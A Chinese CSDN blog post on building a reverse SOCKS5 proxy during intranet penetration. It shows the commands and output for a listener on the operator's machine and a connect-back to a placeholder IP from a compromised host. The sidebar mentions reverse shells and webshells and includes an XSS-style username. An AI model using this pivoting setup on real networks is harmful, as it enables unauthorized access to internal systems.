反弹socks代理。

最新推荐文章于 2022-02-23 15:02:25 发布
最新推荐文章于 2022-02-23 15:02:25 发布
阅读量3.2k 收藏
点赞数
文章标签: command c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/inject2006/article/details/2643657
版权
在内网渗透中,反弹socks代理是很必要的,大家都知道用lcx来转发端口,好像很少看到有人是直接反弹代理来连接。因为我们要连接内网的其 它机器,我们不可能一个一个的去中转端口连接,在当前控制的机器上开代理也没办法,因为对方在内网。所以我们就用反弹代理的方式。这种方式其实大家都明 白。

  首先在本机监听:

  c:/>hd -s -listen 53 1180

  [+] Listening ConnectBack Port 53 ……

  [+] Listen OK!

  [+] Listening Socks5 Agent Port 1180 ……

  [+] Listen2 OK!

  [+] Waiting for MainSocket on port:53 ……

  此命令是将连接进来的53端口的数据包连接到1180端口。

  在对方机器上运行:

  C:/RECYCLER>hd -s -connect x.x.x.x 53

  [+] MainSocket Connect to x.x.x.x:53 Success!

  [+] Send Main Command ok!

  [+] Recv Main Command ok!

  [+] Send Main Command again ok!

  上面的x.x.x.x为你的外网ip,下面为你接收到反弹回来的代理显示的情况。

  c:/>hd -s -listen 53 1180

  [+] Listening ConnectBack Port 53 ……

  [+] Listen OK!

  [+] Listening Socks5 Agent Port 1180 ……

  [+] Listen2 OK!

  [+] Waiting for MainSocket on port:53 ……

  [+] Recv Main Command Echo ok!

  [+] Send Main Command Echo ok!

  [+] Recv Main Command Echo again ok!

  [+] Get a MainSocket on port 53 from x.x.x.x ……

  [+] Waiting Client on Socks5 Agent Port:1180….

  上面ok了,接下来在你本机安装sockscap,照下图设置就ok了。

 

  

inject2006
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
内网渗透系列之Pivoting跳板攻击与自动路由的配置以及使用ProxyChains进行代理扫描并获取内网服务器权限
lza20001103的博客
09-04 2138
Pivoting跳板攻击与自动路由的配置使用以及ProxyChains进行代理扫描并获取内网服务器权限 文章目录Pivoting跳板攻击与自动路由的配置使用以及ProxyChains进行代理扫描并获取内网服务器权限前言msf反弹shell配置路由存活主机探测端口扫描后记 前言 相信大家在内网渗透过程中都会遇到,进入内网后,无法访问内网页面的情况,这是我们就需要配置路由信息,访问内网页面,然后设置socks4代理进行扫描端口的信息,进而利用相关端口,利用相关的漏洞信息,进行漏洞利用,获取靶机的权限。这就是内网
ssocks 反弹socks代理
01-15
ssocks 合集反弹socks代理,用于内网管理。
反向socks5代理工具
我想做一个好人<svg/onload=Alert`1`>(
09-08 776
github.com/yuxiaokui/gohtran 闲来无事,用golang写了个反向socks5代理工具. 方便搞渗透的同学们使用. 首先在公网VPS上执行listener 3389 33333 3389端口是用来监听肉鸡上线的,后面的33333端口是开放的socks5服务端口. 然后在内网的肉鸡中执行client vps_ip:3389 webshell也可以玩哦. OK,配上socks5代理,尽情内网漫游吧. 本工具完全开源,大家随意修改. ...
反弹代理环境的搭建
天使也掉毛
06-10 2073
反弹代理环境的搭建 前几天工作无意中接触到这个,这个方案是同事提出来的,之前没用过反弹代里相关,没啥难度,基本的工具使用而已,整理下留个笔记方便以后查阅。这里涉及到的反向代理软件就直接用网上别人写好的,后期有时间在自己写代理软件相关,实现并不是有多难。到时候会更新到我的个人主页上,感兴趣的可以留意。 先说下概念,平时所说的代理其实就是正向,也就是找到一个公网服务器,挂上代理请求...
EW之Socks5反向代理内网穿透
sweetie 的博客
09-23 2469
EW(earthworm)功能介绍 EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。 准备阶段 在靶机网站上传一句话马使用蚁剑连接 ipconfig /all 一台外网vps:110.42.229.X 一台内网靶机:192.168.1.5(3389开放) 内网机器(无公网ip需要反弹到公网,需要在vps监听
Socks代理反弹突破内网(freebuf)
cnbird's blog
09-02 4387
随着信息安全意识的提升,越来越多的信息系统前端均部署有防火墙,系统管理员根据业务需求将内部必要的服务端口通过端口映射等手段映射到公网中,如默认web服务端口80、MSSQL数据库服务端口1433等。通过部署防火墙可以将信息系统内部区域与公网逻辑隔离开来,利用相关的策略有效避免或减轻来自外部的攻击。 对于渗透测试者来说,如何绕过防火墙的阻挡在内网展开渗透测试成为亟需解决的问题,本文介绍了在夺取映射
第70天:内网安全-域横向内网漫游Socks代理隧道技术1
08-03
内网安全是信息技术领域中的一个重要话题,特别是在企业网络环境中,域横向内网漫游Socks代理隧道技术是一种解决内网间通信难题的有效方法。本文将详细介绍相关知识点,并通过实际案例来展示如何应用这些技术。 ...
Sockscap用于socks反弹
03-07
无需多次转发端口,配合hd实现防火墙后的内网渗透,socks代理反弹
Xsocks 反弹代理s5
08-26
反弹式内网代理软件,Usage : xsocks [-l port] [-t] [-p1 port] [-p2 port] [-s ip:port] [-r ip:port] [-u username] [-p password] Options : -l Set forward mode on Socks5. -r Set reverse mode on Socks5. ...
Socks代理反弹突破内网
不懂
09-19 984
随着信息安全意识的提升,越来越多的信息系统前端均部署有防火墙,系统管理员根据业务需求将内部必要的服务端口通过端口映射等手段映射到公网中,如默认web服务端口80、MSSQL数据库服务端口1433等。通过部署防火墙可以将信息系统内部区域与公网逻辑隔离开来,利用相关的策略有效避免或减轻来自外部的攻击。对于渗透测试者来说,如何绕过防火墙的阻挡在内网展开渗透测试成为亟需解决的问题,本文介绍了在夺取映射到...
rsocks:SOCKS 45反向代理服务器
05-10
索克斯 RSOCKS是反向代理服务器,用于通过SOCKS 4/5代理传输特定主机的流量。 对于在没有SOCKS代理支持的应用程序中使用SOCKS 4/5很有用。 安装 $ pip install rsocks 或者 $ easy_install rsocks 要升级到最新版本,您可以执行: $ pip install -U rsocks 资源 用法 首先,我们需要创建一个具有以下格式的配置文件: # /path/to/rsocks.toml [servers.foo] proxy = "socks4://user:pass@192.168.1.10:1080" listen_host = "0.0.0.0" listen_port = 5025 upstream_host = "smtp.example.com" upstream_port = 25 upstream_ssl = fa
xsocks反弹代理
07-19
xsocks反弹代理工具
渗透测试之反弹代理socks代理) (Earthworm工具) (windows和linux中的代理
broing55的博客
03-18 2200
反弹代理 内网渗透不光只是反弹一个shell,反弹一个端口,我们更需要对内网进行更深一步的扫描和渗透,这时候就需要设置找到一个代理服务器,充当外网和内网数据转发的节点。 所以出现了反弹代理,也叫反弹socket。 使用工具:ew,支持http,https等代理 Socks代理 全能代理,就像有很多跳线的转接板,它只是简单地将一端的系统连接到另外一端。支持多种协议,包括http、ftp...
EW(EarthWorm) 反向 socks5 代理
为之的博客
12-14 1676
今天本想对学校的内网服务器进行人生中第一次横向渗透,奈何情况不允许,但好歹学习了一些东西,总要写下来保存 工具: EW:https://github.com/idlefire/ew proxychains:https://github.com/rofl0r/proxychains-ng 小米随身wifi:http://bigota.miwifi.com/xiaoqiang/miniwifi/miwifi_setup_1b601_848.exe phpstudy:https://m.x...
内网转发——反弹代理
cxrpty的博客
03-18 1282
内网渗透不光只是反弹一个shell,反弹一个端口,我们更需要对内网进行更深一步的扫描和渗透,这时候就需要设置找到一个代理服务器,充当外网和内网数据转发的节点。所以出现了反弹代理,也叫反弹socket 实验一:利用Earthworm实现内网代理转发 实验1:正向代理 实验环境 :win2008 网卡一:10.1.1.1 ...
通过反向ssh连接+socks5+web-proxy来访问内网资源
蚂蚁大战大象
11-08 5154
最近碰到个这么个问题,校园网内的资源只能在校园网内访问,在寝室里连不到校园网时候就无法访问了,很不方便。所以想了一个方案来解决这个问题。 所需硬件:一台有公网IP的linux主机 A,一台在校园网内的Linux主机 B。 所需软件:openssh, delegated. 思路1.通过从B建立一个反向ssh连接到A上,建立一个ssh连接 C。 2.在B上通过C运行ssh连接D(该连接用于sock
K8s 很难么?带你从头到尾捋一遍,不信你学不会
民工哥的博客
02-23 8995
点击关注公众号,回复“1024”获取2TB学习资源!为什么要学习 Kubernetes?虽然 Docker 已经很强大了,但是在实际使用上还是有诸多不便,比如集群管理、资源调度、文件管理等...
qwebengineview socks代理
最新发布
08-19
如果您想在使用 QWebEngineView 进行网络请求时使用 SOCKS 代理,可以按照以下步骤进行设置: 1. 首先,您需要在项目中添加 QtNetwork 模块的依赖。在您的 .pro 文件中添加以下行: ``` QT += network ``` 2. ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

inject2006

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值